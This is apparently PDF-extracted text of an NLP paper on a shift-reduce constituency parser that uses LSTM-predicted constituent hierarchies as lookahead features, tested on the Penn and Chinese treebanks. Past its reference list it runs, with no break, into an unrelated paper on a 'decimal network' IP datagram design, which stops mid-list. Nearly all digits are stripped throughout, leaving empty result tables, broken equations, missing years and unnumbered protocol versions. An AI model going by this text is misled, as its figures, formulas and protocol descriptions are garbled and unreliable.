buffer (i.e., q and q ). the new function Φ′ is defined to output the lookahead features vector. the scoring of a state in our model is based on formula ( ) but with a new term Φ′(αi) · ~θ′: c′(α) = n∑ i= Φ(αi) ·~θ + Φ′(αi) · ~θ′ for each word, the lookahead feature represents the next level constituent in the top-down hierarchy, which can guide bottom-up parsing. for example, figure shows two intermediate states during parsing. in figure (a), the s-type and e-type lookahead features of s (i.e., the word “the” are extracted from the constituent hierarchy in the bottom level, namely np and null, respec- tively. on the other hand, in figure (b), the s-type lookahead feature of s is extracted from the s-type constituent hierarchy of same word “the”, but it is s based on current hierarchical level. the e-type lookahead feature, on the other hand, is extracted from the e-type constituent hierarchy of end word “students” of the vp constituent, which is null in the next level. lookahead features for items on the buffer are extracted in the same way. the lookahead features are useful for guiding shift-reduce decisions given the current state. for stack buffer dt the jj past cc and jj present s s s np Ø adjp Ø s gs s ge=nulls gs s ge=null Ø Ø Ø adjp q q q gs=null q ge=null q gs=null q ge np vb dt nn dt nns s s q q the students like this book s np vp vp Ø np npØ Ø s ge=null s gs s ge=null q gs q ge=null q gs=null stack buffer q ges gs adjp past and present (a) (b) incorrect constituent hierarchy look-ahead features configuration figure : two intermediate states for parsing on the sentence “the past and present students like this book on the table”. each item on the stack or buffer has two constituent hierarchies: s-type (left) and e-type (right), respectively, in the corresponding box. note that the e-type constituent hierarchy of the word “students” is incorrectly predicted, yet used as soft constraints (i.e., features) in our model. example, given the intermediate state in figure (a), s has a s-type lookahead feature adjp, and q in the buffer has e-type lookahead feature adjp. this indicates that the two items are likely reduced into the same constituent. further, s cannot end a con- stituent because of the empty e-type constituent hi- erarchy. as a result, the final shift-reduce parser will assign a higher score to the shift decision. constituent hierarchy prediction we propose a novel neural model for constituent hi- erarchy prediction. inspired by the encoder-decoder framework for neural machine translation (bah- danau et al., ; cho et al., ), we use an lstm to capture full sentence features, and another lstm to generate the constituent hierarchies for each word. compared with a crf-based sequence labelling model (roark and hollingshead, ), the proposed model has three advantages. first, the global features can be automatically represented. second, it can avoid the exponentially large num- ber of labels if constituent hierarchies are treated as unique labels. third, the model size is relatively small, and does not have a large effect on the final parser model. as shown in figure , the neural network con- sists of three main layers, namely the input layer, the encoder layer and the decoder layer. the input layer represents each word using its characters and token information; the encoder hidden layer uses a bidirectional recurrent neural network structure to learn global features from the sentence; and the de- coder layer predicts constituent hierarchies accord- ing to the encoder layer features, by using the atten- tion mechanism (bahdanau et al., ) to compute the contribution of each hidden unit of the encoder. . input layer the input layer generates a dense vector representa- tion of each input word. we use character embed- dings to alleviate oov problems in word embed- dings (ballesteros et al., ; santos and zadrozny, ; kim et al., ), concatenating character- embeddings of a word with its word embedding. formally, the input representation xi of the word wi is computed by: xi = [xwi ; ci att] ci att = ∑ j αijc ′ ij, where xwi is a word embedding vector of the word wi according to a embedding lookup table, ci att is a character embedding form of the word wi, cij is the embedding of the jth character in wi, c′ij is the character window representation centered at cij, and αij is the contribution of the c′ij to ci att, which is computed by: αij = e f(xwi,c ′ ij) ∑ k e f(xwi,c ′ ik ) f is a non-linear transformation function. … h h hn h h hn … … softmax … c , c , c ,m … … xw attention pooling decoder layer input layer encoder layer y j x xnx s js j- c _att … x’ x’nx’ h h hn … cn, … … xwn attention pooling cn_att … cn, cn,m’ windows windows windows … c’ , c’ , c’ ,m c’n, c’n, c’n,m’ figure : structure of the constituent hierarchy pre- diction model. −→ hi denotes the left-to-right encoder hidden units; ←− hi denotes the right-to-left encoder hidden units; s denotes the decoder hidden state vec- tor; and yij is the jth label of the word wi. . encoder layer the encoder first uses a window strategy to repre- sent input nodes with their corresponding local con- text nodes. formally, a word window representation takes the form x′i = [xi−win; ...; xi; ...; xi+win]. second, the encoder scans the input sentence and generates hidden units for each input word using a recurrent neural network (rnn), which represents features of the word from the global sequence. for- mally, given the windowed input nodes x′ , x ′ , ..., x′n for the sentence w , w , ..., wn, the rnn layer calculates a hidden node sequence h , h , ..., hn. long short-term memory (lstm) mitigates the vanishing gradient problem in rnn training, by in- troducing gates (i.e., input i, forget f and output o) and a cell memory vector c. we use the variation of graves and schmidhuber ( ). formally, the values in the lstm hidden layers are computed as follows: ii = σ(w x ′ i + w hi− + w � ci− + b ) fi = − ii c̃i = tanh(w x ′ i + w hi− + b ) ci = fi � ci− + ii � c̃i oi = σ(w x ′ i + w hi− + w � ci + b ) hi = oi � tanh(ci), where � is pair-wise multiplication. further, in or- der to collect features for xi from both x′ , .., x ′ i− and x′i+ , ... x ′ n, we use a bidirectional variation (schuster and paliwal, ; graves et al., ). as shown in figure , the hidden units are generated by concatenating the corresponding hidden layers of a left-to-right lstm −→ hi and a right-to-left lstm ←− hi , where ←→ hi = [ −→ hi ; ←− hi ] for each word wi. . decoder layer the decoder hidden layer uses two different lstms to generate the s-type and e-type sequences of con- stituent labels from each encoder hidden output, re- spectively, as shown in figure . each constituent hierarchy is generated bottom-up recurrently. in particular, a sequence of state vectors is generated recurrently, with each state yielding a output con- stituent label. the process starts with a ~ state vec- tor and ends when a null constituent is generated. the recurrent state transition process is achieved us- ing an lstm model with the hidden vectors of the encoder layer being used for context features. formally, for word wi, the value of the jth state unit sij of the lstm is computed by: sij = f(sij− ,aij, ←→ hi ) , where the context aij is computed by: aij = ∑ k βijk ←→ hk βijk = ef(sij− , ←→ hk ) ∑ k′ e f(sij− , ←→ hk′) here, different from typical mt models (bahdanau et al., ), the chain is predicted sequentially in a feed-forward way with no feedback of the prediction made. we found that this fast alternative gives similar results. here ←→ hk refers to the encoder hidden vector for wk. the weights of contribution βijk are computed using the attention mechanism (bahdanau et al., ). the constituent labels are generated from each state unit sij, where each constituent label yij is the output of a softmax function, p(yij = l) = e s>ijwl ∑ k e s>ijwk yij = l denotes that the jth label of the ith word is l(l ∈ l). as shown in figure , the softmax functions are applied to the state units of the decoder, gener- ating hierarchical labels bottom-up, until the default label null is predicted. . training we use two separate models to assign the s-type and e-type labels, respectively. for training each con- stituent hierarchy predictor, we minimize the follow- ing training objective: l(θ) = − t∑ i zi∑ j log pijo + λ ||θ|| , where t is the length of the sentence, zi is the depth of the constituent hierarchy of the word wi, and pijo stands for p(yij = o), which is given by the soft- max function, and o is the gold label. we apply back-propagation, using momentum stochastic gradient descent (sutskever et al., ) with a learning rate of η = . for optimization and regularization parameter λ = − . experiments . experiment settings our english data are taken from the wall street jour- nal (wsj) sections of the penn treebank (marcus et al., ). we use sections - for training, section for system development, and section for final performance evaluation. our chinese data are taken from the version . of the penn chinese treebank (ctb) (xue et al., ). we use articles - and - for training, articles - for sys- tem development, and articles - for final per- formance evaluation. for both english and chinese hyper-parameters value word embedding size word window size character embedding size character window size lstm hidden layer size character hidden layer size table : hyper-parameter settings s-type e-type parser -layer . . . -layer . . . -layer . . . table : performance of the constituent hierarchy predictor and the corresponding parser on the wsj dev dataset. n-layer denotes an lstm model with n hidden layers. data, we adopt zpar for pos tagging, and use ten- fold jackknifing to assign pos tags automatically to the training data. in addition, we use ten-fold jack- knifing to assign constituent hierarchies automati- cally to the training data for training the parser using the constituent hierarchy predictor. we use f score to evaluate constituent hierarchy prediction. for example, if the prediction is “s → s → vp → np” and the gold is “s → np → np”, the evaluation process matches the two hierarchies bottom-up. the precision is / = . , the recall is / = . and the f score is . . a label is counted as correct if and only if it occurs at the cor- rect position. we use evalb to evaluate parsing performance, including labelled precision (lp ), labelled recall (lr), and bracketing f . . model settings for training the constituent hierarchy prediction model, gold constituent labels are derived from la- belled constituency trees in the training data. the hyper-parameters are chosen according to develop- ment tests, and the values are shown in table . for the shift-reduce constituency parser, we set the beam size to for both training and decoding, which achieves a good tradeoff between efficiency https://github.com/sutdnlp/zpar http://nlp.cs.nyu.edu/evalb s-type e-type parser all . . . all w/o wins . . . all w/o chars . . . all w/o chars & wins . . . table : performance of the constituent hierarchy predictor and the corresponding parser on the wsj dev dataset. all denotes the proposed model with- out ablation. wins denotes input windows. chars denotes character-based attention. and accuracy (zhu et al., ). the optimal train- ing iteration number is determined on the develop- ment sets. . results of constituent hierarchy prediction table shows the results of constituent hierarchy prediction, where word and character embeddings are randomly initialized, and fine-tuned during train- ing. the third column shows the development pars- ing accuracies when the labels are used for looka- head features. as table shows, when the number of hidden layers increases, both s-type and e-type constituent hierarchy prediction improve. the accu- racy of e-type prediction is relatively lower due to right-branching in the treebank, which makes e-type hierarchies longer than s-type hierarchies. in addi- tion, a -layer lstm does not give significant im- provements compared to a -layer lstm. for better tradeoff between efficiency and accuracy, we choose the -layer lstm as our constituent hierarchy pre- dictor. table shows ablation results for constituent hi- erarchy prediction given by different reduced ar- chitectures, which include an architecture without character embeddings and an architecture with nei- ther character embeddings nor input windows. we find that the original architecture achieves the high- est performance on constituent hierarchy prediction, compared to the two baselines. the baseline only without character embeddings has relatively small influence on constituent hierarchy prediction. on the other hand, the baseline only without input word windows has relatively smaller influence on con- stituent hierarchy prediction. nevertheless, both of these two ablation architectures lead to lower pars- parser lr lp f fully-supervised ratnaparkhi ( ) . . . charniak ( ) . . . collins ( ) . . . sagae and lavie ( )† . . . sagae and lavie ( )† . . . petrov and klein ( ) . . . carreras et al. ( ) . . . shindo et al. ( ) n/a n/a . zhu et al. ( )† . . . socher et al. ( )* n/a n/a . vinyals et al. ( )* n/a n/a . cross and huang ( )*† n/a n/a . dyer et al. ( )*† n/a n/a . this work . . . ensemble shindo et al. ( ) n/a n/a . vinyals et al. ( )* n/a n/a . rerank charniak and johnson ( ) . . . huang ( ) . . . dyer et al. ( )*† n/a n/a . semi-supervised mcclosky et al. ( ) . . . huang and harper ( ) . . . huang et al. ( ) . . . zhu et al. ( )† . . . durrett and klein ( )* n/a n/a . table : comparison of related work on the wsj test set. * denotes neural parsing; † denotes methods using a shift-reduce framework. ing accuracies. the baseline removing both the character embeddings and the input word windows has a relatively low f-score. . final results for english, we compare the final results with previous related work on the wsj test sets. as shown in table , our model achieves . % f improvement compared to the baseline parser with fully-supervised learning (zhu et al., ). our model outperforms the state-of-the-art fully- supervised system (carreras et al., ; shindo et al., ) by . % f . in addition, our fully- supervised model also catches up with many state- of-the-art semi-supervised models (zhu et al., ; we treat the methods as semi-supervised if they use pre- trained word embeddings, word clusters (e.g., brown clusters) or extra resources. parser lr lp f fully-supervised charniak ( ) . . . bikel ( ) . . . petrov and klein ( ) . . . zhu et al. ( )† . . . wang et al. ( )‡ n/a n/a . dyer et al. ( )*† n/a n/a . this work . . . rerank charniak and johnson ( ) . . . dyer et al. ( )*† n/a n/a . semi-supervised zhu et al. ( )† . . . wang and xue ( )‡ n/a n/a . wang et al. ( )‡ n/a n/a . table : comparison of related work on the ctb . test set. * denotes neural parsing; † denotes methods using a shift-reduce framework; ‡ denotes joint pos tagging and parsing. huang and harper, ; huang et al., ; dur- rett and klein, ) by achieving . % f on wsj test set. the size of our model is much smaller than the semi-supervised model of zhu et al. ( ), which contains rich features from a large automat- ically parsed corpus. in contrast, our model is about the same in size compared to the baseline parser. we carry out chinese experiments with the same models, and compare the final results with previous related work on the ctb test set. as shown in table , our model achieves . % f improvement com- pared to the state-of-the-art baseline system with fully-supervised learning (zhu et al., ), which is by far the best result in the literature. in addition, our fully-supervised model is also comparable to many state-of-the-art semi-supervised models (zhu et al., ; wang and xue, ; wang et al., ; dyer et al., ) by achieving . % f on the ctb test set. wang and xue ( ) and wang et al. ( ) do joint pos tagging and parsing. . comparison of speed table shows the running times of various parsers on test sets on a intel . ghz processor with g memory. our parsers are much faster than the re- lated parser with the same shift-reduce framework (sagae and lavie, ; sagae and lavie, ). compared to the baseline parser, our parser gives parser #sent/second ratnaparkhi ( ) unk collins ( ) . charniak ( ) . sagae and lavie ( ) . sagae and lavie ( ) . petrov and klein ( ) . carreras et al. ( ) unk zhu et al. ( ) . this work . table : comparison of running times on the test set, where the time for loading models is excluded. the running times of related parsers are taken from zhu et al. ( ). significant improvement on accuracies ( . % to . % f ) at the speed of . sentences per sec- ond , in contrast to . sentences per second on the standard wsj benchmark. error analysis we conduct error analysis by measuring parsing ac- curacies against: different phrase types, constituents of different span lengths, and different sentence lengths. . phrase type table shows the accuracies of the baseline and the final parsers with lookahead features on common phrase types. as the results show, while the parser with lookahead features achieves improvements on all of the frequent phrase types, there are relatively higher improvements on vp, s, sbar and whnp. the constituent hierarchy predictor has relatively better performance on s-type labels for the con- stituents vp, whnp and pp, which are prone to errors by the baseline system. the constituent hi- erarchy can give guidance to the constituent parser for tackling the issue. compared to the s-type con- stituent hierarchy, the e-type constituent hierarchy the constituent hierarchy prediction is excluded, which processes an average of sentences per second on a single cpu. the cost of this step is far less than the cost of parsing, and can be essentially eliminated by pipelining the constituent hierarchy prediction and the shift-reduce decoder, by launching the constituent hierarchy predictor first, and then starting pars- ing in parallel as soon as the lookahead output is available for the first sentence, since the lookahead will outpace the parsing from that point forward. span length f s co re (% ) baseline lookahead figure : comparison with the baseline on spans of different lengths. is relatively more difficult to predict, particularly for the constituents with long spans such as vp, s and sbar. despite this, the e-type constituent hi- erarchies with relatively low accuracies also benefit prediction of constituents with long spans. . span length figure shows the f -scores of the two parsers on constituents with different span lengths. as the re- sults show, lookahead features are helpful on both large spans and small spans, and the performance gap between the two parsers is larger as the size of span increases. this reflects the usefulness of long- range information captured by the constituent hier- archy predictor and lookahead features. . sentence length figure shows the f -scores of the two parsers on sentences of different lengths. as the results show, the parser with lookahead features outperforms the baseline system on both short sentences and long sentences. also, the performance gap between the two parsers is larger as the length of sentence in- creases. the constituent hierarchy predictors generate hi- erarchical constituents for each input word using global information. for longer sentences, the pre- dictors yield deeper constituent hierarchies, offer- ing corresponding lookahead features. as a result, compared to the baseline parser, the performance of the parser with lookahead features decreases more slowly as the length of the sentences increases. + f sc or e (% ) baseline lookahead figure : comparison with the baseline on sen- tences of different lengths. sentences with length [ , ) fall in the bin . related work our lookahead features are similar in spirit to the pruners of roark and hollingshead ( ) and zhang et al. ( b), which infer the maximum length of constituents that a particular word can start or end. however, our method is different in three main ways. first, rather than using a crf with sparse local word window features, a neural network is used for dense global features on the sentence. second, not only the size of constituents but also the constituent hierarchy is identified for each word. third, the results are added into a transition-based parser as soft features, rather then being used as hard constraints to a chart parser. our concept of constituent hierarchies is simi- lar to supertags in the sense that both are shallow parses. for lexicalized grammars such as combi- natory categorial grammar (ccg), tree-adjoining grammar (tag) and head-driven phrase structure grammar (hpsg), each word in the input sentence is assigned one or more supertags, which are used to identify the syntactic role of the word to constrain parsing (clark, ; clark and curran, ; car- reras et al., ; ninomiya et al., ; dridan et al., ; faleńska et al., ). for a lexical- ized grammar, supertagging can benefit the parsing in both accuracy and efficiency by offering almost- parsing information. in particular, carreras et al. ( ) used the concept of spine for tag (schabes, ; vijay-shanker and joshi, ), which is sim- ilar to our constituent hierarchy. however, there are three differences. first, the spine is defined to de- scribe the main syntactic tree structure with a series np vp s pp sbar advp adjp whnp qp baseline . . . . . . . . . with lookahead feature . . . . . . . . . improvement + . + . + . + . + . + . + . + . + . constituent hierarchy s-type . . . . . . . . . e-type . . . . . . . . . table : comparison between the parsers with lookahead features on different phrases types, with the corresponding constituent hierarchy predictor performances. of unary projections, while constituent hierarchy is defined to describe how words can start or end hi- erarchical constituents (it can be empty if the word cannot start or end constituents). second, spines are extracted from gold trees and used to prune the search space of parsing as hard constraints. in con- trast, we use constituent hierarchies as soft features. third, carreras et al. ( ) use spines to prune chart parsing, while we use constituent hierarchies to improve a linear shift-reduce parser. for lexicalized grammars, supertags can benefit parsing significantly since they contain rich syntac- tic information as almost parsing (bangalore and joshi, ). recently, there has been a line of work on better supertagging. zhang et al. ( a) proposed efficient methods to obtain supertags for hpsg parsing using dependency information. xu et al. ( ) and vaswani et al. ( ) leverage recur- sive neural networks for supertagging for ccg pars- ing. in contrast, our models predict the constituent hierarchy instead of a single supertag for each word in the input sentence. our constituent hierarchy predictor is also related to sequence-to-sequence learning (sutskever et al., ), which has been successfully used in neural machine translation (bahdanau et al., ). the neural model encodes the source-side sentence into dense vectors, and then uses them to generate target- side word by word. there has also been work that di- rectly applies sequence-to-sequence models for con- stituent parsing, which generates constituent trees given raw sentences (vinyals et al., ; luong et al., ). compared to vinyals et al. ( ), who predict a full parse tree from input, our predictors tackle a much simpler task, by predicting the con- stituent hierarchies of each word separately. in ad- dition, the outputs of the predictors are used for soft lookahead features in bottom-up parsing, rather than being taken as output structures directly. by integrating a neural constituent hierarchy pre- dictor, our parser is related to neural network mod- els for parsing, which has given competitive accura- cies for both constituency parsing (dyer et al., ; cross and huang, ; watanabe and sumita, ) and dependency parsing (chen and manning, ; zhou et al., ; dyer et al., ). in par- ticular, our parser is more closely related to neu- ral models that integrate discrete manual features (socher et al., ; durrett and klein, ). socher et al. ( ) use neural features to rerank a sparse baseline parser; durrett and klein directly in- tegrate sparse features into neural layers in a chart parser. in contrast, we integrate neural information into sparse features in the form of lookahead fea- tures. there has also been work on lookahead features for parsing. tsuruoka et al. ( ) run a baseline parser for a few future steps, and use the output ac- tions to guide the current action. in contrast to their model, our model leverages full sentential informa- tion, yet is significantly faster. previous work investigated more efficient parsing without loss of accuracy, which is required by real time applications, such as web parsing. zhang et al. ( b) introduced a chart pruner to accelerate a ccg parser. kummerfeld et al. ( ) proposed a self-training method focusing on increasing the speed of a ccg parser rather than its accuracy. conclusion we proposed a novel constituent hierarchy predic- tor based on recurrent neural networks, aiming to capture global sentential information. the resulting constituent hierarchies are fed to a baseline shift- reduce parser as lookahead features, addressing lim- itations of shift-reduce parsers in not leveraging right-hand side syntax for local decisions, yet main- taining the same model size and speed. the resulting fully-supervised parser outperforms the state-of-the- art baseline parser by achieving . % f on stan- dard wsj evaluation and . % f on standard ctb evaluation. acknowledgments we thank the anonymous reviewers for their detailed and constructive comments, and the co-editor-in- chief lillian lee for her extremely detailed copy editing. this work is supported by t moe of singapore ministry of education. yue zhang is the corresponding author. references dzmitry bahdanau, kyunghyun cho, and yoshua ben- gio. . neural machine translation by jointly learning to align and translate. iclr. miguel ballesteros, chris dyer, and noah a. smith. . improved transition-based parsing by modeling characters instead of words with lstms. in emnlp, pages – . srinivas bangalore and aravind k. joshi. . su- pertagging: an approach to almost parsing. compu- tational linguistics, ( ): – , june. daniel m. bikel. . on the parameter space of gener- ative lexicalized statistical parsing models. phd the- sis, university of pennsylvania. xavier carreras, michael collins, and terry koo. . tag, dynamic programming, and the perceptron for efficient, feature-rich parsing. in conll, pages – , morristown, nj, usa. association for computational linguistics. eugene charniak and mark johnson. . coarse-to- fine n-best parsing and maxent discriminative rerank- ing. in acl. eugene charniak. . a maximum-entropy-inspired parser. in anlp, pages – . danqi chen and christopher manning. . a fast and accurate dependency parser using neural networks. in emnlp, pages – , stroudsburg, pa, usa. as- sociation for computational linguistics. kyunghyun cho, bart van merrienboer, çaglar gülçehre, dzmitry bahdanau, fethi bougares, holger schwenk, and yoshua bengio. . learning phrase represen- tations using rnn encoder-decoder for statistical ma- chine translation. in emnlp, pages – . stephen clark and james r. curran. . the impor- tance of supertagging for wide-coverage ccg pars- ing. in coling, pages – , morristown, nj, usa, august. university of edinburgh, association for computational linguistics. stephen clark. . supertagging for combinatory cat- egorial grammar. in proceedings of the sixth inter- national workshop on tree adjoining grammar and related frameworks, pages – , universita di venezia. michael collins and brian roark. . incremental parsing with the perceptron algorithm. in acl, mor- ristown, nj, usa. association for computational lin- guistics. michael collins. . head-driven statistical models for natural language parsing. computational linguis- tics, ( ): – . james cross and liang huang. . span-based con- stituency parsing with a structure-label system and provably optimal dynamic oracles. in emnlp. rebecca dridan, valia kordoni, and jeremy nicholson. . enhancing performance of lexicalised gram- mars. in acl. greg durrett and dan klein. . neural crf parsing. in acl, pages – . chris dyer, miguel ballesteros, wang ling, austin matthews, and noah a. smith. . transition- based dependency parsing with stack long short-term memory. in acl-ijcnlp, pages – . chris dyer, adhiguna kuncoro, miguel ballesteros, and noah a. smith. . recurrent neural network grammars. in naacl, pages – . agnieszka faleńska, anders björkelund, özlem çetinoğlu, and wolfgang seeker. . stacking or supertagging for dependency parsing – what’s the difference? in proceedings of the th international conference on parsing technologies. joshua goodman. . parsing inside-out. phd thesis, harvard university. alex graves and jürgen schmidhuber. . offline handwriting recognition with multidimensional recur- rent neural networks. in nips, pages – . alex graves, navdeep jaitly, and abdel-rahman mo- hamed. . hybrid speech recognition with deep bidirectional lstm. in ieee workshop on automatic speech recognition & understanding (asru), pages – . ieee. sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – , november. zhongqiang huang and mary p. harper. . self- training pcfg grammars with latent annotations across languages. in emnlp, pages – . zhongqiang huang, mary p. harper, and slav petrov. . self-training with products of latent variable grammars. in emnlp, pages – . liang huang. . forest reranking: discriminative parsing with non-local features. in acl, pages – . yoon kim, yacine jernite, david sontag, and alexan- der m. rush. . character-aware neural language models. in aaai. jonathan k. kummerfeld, jessika roesner, tim daw- born, james haggerty, james r. curran, and stephen clark. . faster parsing by supertagger adap- tation. in acl, pages – . university of cam- bridge, association for computational linguistics, july. minh-thang luong, quoc v. le, ilya sutskever, oriol vinyals, and lukasz kaiser. . multi-task se- quence to sequence learning. iclr. mitchell p. marcus, beatrice santorini, and mary ann marcinkiewicz. . building a large annotated cor- pus of english: the penn treebank. computational linguistics, ( ): – . david mcclosky, eugene charniak, and mark johnson. . effective self-training for parsing. in hlt- naacl, pages – , morristown, nj, usa. as- sociation for computational linguistics. takashi ninomiya, takuya matsuzaki, yoshimasa tsu- ruoka, yusuke miyao, and jun’ichi tsujii. . ex- tremely lexicalized models for accurate and fast hpsg parsing. in emnlp, pages – . university of manchester, association for computational linguis- tics, july. slav petrov and dan klein. . improved inference for unlexicalized parsing. in hlt-naacl, pages – . adwait ratnaparkhi. . a linear observed time sta- tistical parser based on maximum entropy models. in emnlp. brian roark and kristy hollingshead. . linear complexity context-free parsing pipelines via chart constraints. in hlt-naacl, pages – . kenji sagae and alon lavie. . a classifier-based parser with linear runtime complexity. in iwpt, pages – , morristown, nj, usa. association for com- putational linguistics. kenji sagae and alon lavie. . parser combination by reparsing. in hlt-naacl, pages – , mor- ristown, nj, usa. association for computational lin- guistics. cicero d. santos and bianca zadrozny. . learning character-level representations for part-of-speech tag- ging. in icml, pages – . yves schabes. . stochastic tree-adjoining gram- mars. in proceedings of the workshop on speech and natural language, pages – . association for computational linguistics. mike schuster and kuldip k. paliwal. . bidirec- tional recurrent neural networks. signal processing, ieee transaction, ( ): – . hiroyuki shindo, yusuke miyao, akinori fujino, and masaaki nagata. . bayesian symbol-refined tree substitution grammars for syntactic parsing. in acl, pages – . richard socher, john bauer, christopher d. manning, and andrew y. ng. . parsing with compositional vector grammars. in acl, pages – . ilya sutskever, james martens, george e. dahl, and ge- offrey e. hinton. . on the importance of ini- tialization and momentum in deep learning. in icml, pages – . ilya sutskever, oriol vinyals, and quoc v. le. . sequence to sequence learning with neural networks. in nips, pages – . yoshimasa tsuruoka, yusuke miyao, and jun’ichi kazama. . learning with lookahead: can history-based models rival globally optimized models? in conll, pages – . ashish vaswani, yonatan bisk, and kenji sagae. . supertagging with lstms. in naacl. k. vijay-shanker and aravind k. joshi. . a study of tree adjoining grammars. citeseer. oriol vinyals, lukasz kaiser, terry koo, slav petrov, ilya sutskever, and geoffrey e. hinton. . gram- mar as a foreign language. in nips, pages – . zhiguo wang and nianwen xue. . joint pos tag- ging and transition-based constituent parsing in chi- nese with non-local features. in acl, pages – , stroudsburg, pa, usa. association for computational linguistics. zhiguo wang, haitao mi, and nianwen xue. . feature optimization for constituent parsing via neu- ral networks. in acl-ijcnlp, pages – , stroudsburg, pa, usa. association for computational linguistics. taro watanabe and eiichiro sumita. . transition- based neural constituent parsing. in acl, pages – . wenduan xu, michael auli, and stephen clark. . ccg supertagging with a recurrent neural network. in acl-ijcnlp, pages – , stroudsburg, pa, usa. association for computational linguistics. naiwen xue, fei xia, fu-dong chiou, and martha palmer. . the penn chinese treebank: phrase structure annotation of a large corpus. natural lan- guage engineering, ( ): – . yue zhang and stephen clark. . transition-based parsing of the chinese treebank using a global discrim- inative model. in icpt, pages – , morristown, nj, usa. association for computational linguistics. yue zhang and stephen clark. . syntactic process- ing using the generalized perceptron and beam search. computational linguistics, ( ): – . yaozhong zhang, takuya matsuzaki, and jun’ichi tsu- jii. a. a simple approach for hpsg supertag- ging using dependency information. in naacl-hlt, pages – . university of manchester, association for computational linguistics, june. yue zhang, byung-gyu ahn, stephen clark, curt van wyk, james r. curran, and laura rimell. b. chart pruning for fast lexicalised-grammar parsing. in coling, pages – . hao zhou, yue zhang, shujian huang, and jiajun chen. . a neural probabilistic structured-prediction model for transition-based dependency parsing. in acl, pages – . muhua zhu, yue zhang, wenliang chen, min zhang, and jingbo zhu. . fast and accurate shift-reduce con- stituent parsing. in acl, pages – . 引言 international journal of advanced network, monitoring and controls volume , no. , research and design of next generation internet (ipv ) datagram wang zhongsheng . state and provincial joint engineering lab. of advanced network, monitoring and control, china . school of computer science and engineering xi'an technological university xi'an, china e-mail: wzhsh @ .com xie jianping . chinese decimal network working group shanghai, china . shanghai decimal system network information technology ltd. e-mail: @ .cn lin zhao . chinese decimal network working group shanghai, china . shanghai decimal system network information technology ltd. e-mail: chinalinzhao@ .com zhong wei . chinese decimal network working group shanghai, china . shanghai decimal system network information technology ltd. e-mail: @ .cn abstract—the current global internet uses the tcp/ip protocol cluster. ip is the network layer protocol and the core protocol in this protocol family. the current version is ipv with -bit addresses. with the popularity of internet applications, the limited address space defined by ipv has been exhausted. to expand the address space, the internet engineering task force (ietf) has designed the next generation ip protocol, ipv , to replace ipv . ipv redefines the address space, using a -bit address length that provides almost unlimited addresses. however, with the development and application of the internet of things, big data and cloud storage, ipv has some shortcomings in its address structure design, security and network sovereignty, so it is urgent to develop a new generation or future internet with security and reliability, autonomy and controllable , and it becomes a research hotspot in the world. this paper developed a new generation internet (ipv ) datagram by researching the existed ipv and ipv , and it is based on the method of assigning addresses to computers connected to the internet by full decimal character code which designed by the chinese decimal network working group with the leader of xie jianping. it is a subsequent version with rfc , rfc , a new generation of network data structure, it is not the updating of ipv [rfc - ] and ipv [rfc - ], [rfc - ], it is a new vision to demonstration and testing. keywords-future network; ipv ; ipv ; ipv ; datagram a datagram is the basic unit of data transmitted on the network. it contains a header and the data itself, in which the header describes the destination of the data and its relationship to other data. datagram is a complete and independent data entity, which carries the information to be transferred from the source computer to the destination computer and does not rely on the previous exchange between the source and the destination and the transmission network [ ]. tcp/ip protocol defines a packet that is transmitted on the internet; called ip datagram, which are the network layer protocol and the core protocol of the tcp/ip protocol family. doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , ip is a virtual package consisting of a header and data. the ipv header is a fixed length of bytes, which is required for all ip datagram. after the fixed portion of the header are optional fields whose length is variable. both the source and destination addresses in the header are ip protocol addresses. the current global internet uses the tcp/ip protocol cluster, the current version is ipv with -bit addresses. with the popularity of internet applications, the limited address space defined by ipv has been exhausted. to expand the address space, the internet engineering task force (ietf) has designed the next generation ip protocol, ipv , to replace ipv . ipv redefines the address space, using a -bit address length that provides almost unlimited addresses. however, with the development and application of the internet of things, big data and cloud storage, ipv has some shortcomings in its address structure design, security and network sovereignty. the chinese researchers developed a new generation internet (ipv ) datagram by researching the existed ipv and ipv , and it is based on the method of assigning addresses to computers connected to the internet by full decimal character code. it is a subsequent version with rfc , rfc , a new generation of network data structure, it is not the updating of ipv and ipv , it is a new vision to demonstration and testing. i. overall design objective in order to be compatible with the existing internet system, on the basis of studying the existing standard ipv [rfc - ] and ipv [rfc - ] and [rfc - ], the overall goal of ipv datagram design is formulated. ) extended address capacity ipv increases the length of ip addresses from (ipv ) and (ipv ) bits to bits to support more address hierarchies, more addressable nodes, and simpler automatic address configurations. it also increases the ipv bit address length reduced to bits, in order to solve mobile communication. ) variable length and uncertain number digits in order to reduce the network overhead, this datagram designing adopts the method of indefinite length and uncertain number of digits. by adding a "range" field to the multicast address, the scalability of multicast routing is improved. it defines a new address type, "any broadcast address," for sending datagrams to any one of a set of nodes. ) simplify and improve header format some ipv header fields have been eliminated or made optional to reduce the overhead of common processing on packet control and to limit ipv header bandwidth overhead. the encoding of header options has been changed to allow more efficient forwarding, reduce restrictions on the length of options, and gain more flexibility to introduce new options in the future. ) label data streams to attach labels to data streams belonging to a particular data communication, the sender may require special processing of these data streams, such as non- default quality of service or real-time service, such as using virtual circuits to achieve the purpose of circuit communication. ) high safety and reliability to get security and reliability, the new datagram added expansionary support for ip address encryption and authentication, data integrity, and data security (optional) in ipv designing. it extension headers and options take into account the length of packets, the semantics of flow control labels and categories, and the impact on high-level protocols. ) direct routing addressing the icmp (internet control message protocol) version of ipv contains all the requirements for implementing ipv . the function of route character arrangement authentication, recognition and addressing is added, which reduces the routing cost and improves the efficiency. international journal of advanced network, monitoring and controls volume , no. , ) compatible with ipv and ipv in order to ensure a smooth transition from ipv to ipv , considering the protection of the original investment and not changing user habits, this datagram defines ipv header and transitional header. the last segment address is used for the header of ipv or ipv is used, but the version number is changed to , the connection protocols used are ipv or ipv . ) the virtual and real circuit design in order to smoothly transmit voice, image and video and other big data real-time applications, it is necessary to adopt long-stream code, absolute value, return code and other technologies, and adopt three- layer and four-layer network hybrid architecture. three-layer and four-layer network hybrid architecture design should be implemented in virtual and real circuits. ii. general design of system a. some basic terminologies the basic concepts in system designing are defined as follows. ) node: a device installed with ipv or ipv device compatible with ipv and ipv . ) router: the device that is responsible for forwarding and explicitly not sending ipv data to itself. ) host: any node that does not belong to the router. ) upper agreement: protocols located in the layer above ipv . for example, transport layer protocols tcp, udp, a communication facility or medium in the link layer, on which nodes can carry out link-layer communication, that is, the layer just below ipv . examples of links include ethernet (or bridged), ppp links, x. , frame relay, or atm networks. ) neighbor: each node connected to the same link. ) interface: node to link connection. ) address: ipv layer identifier of an interface or a group of interfaces. ) packet: an ipv header plus load. ) link 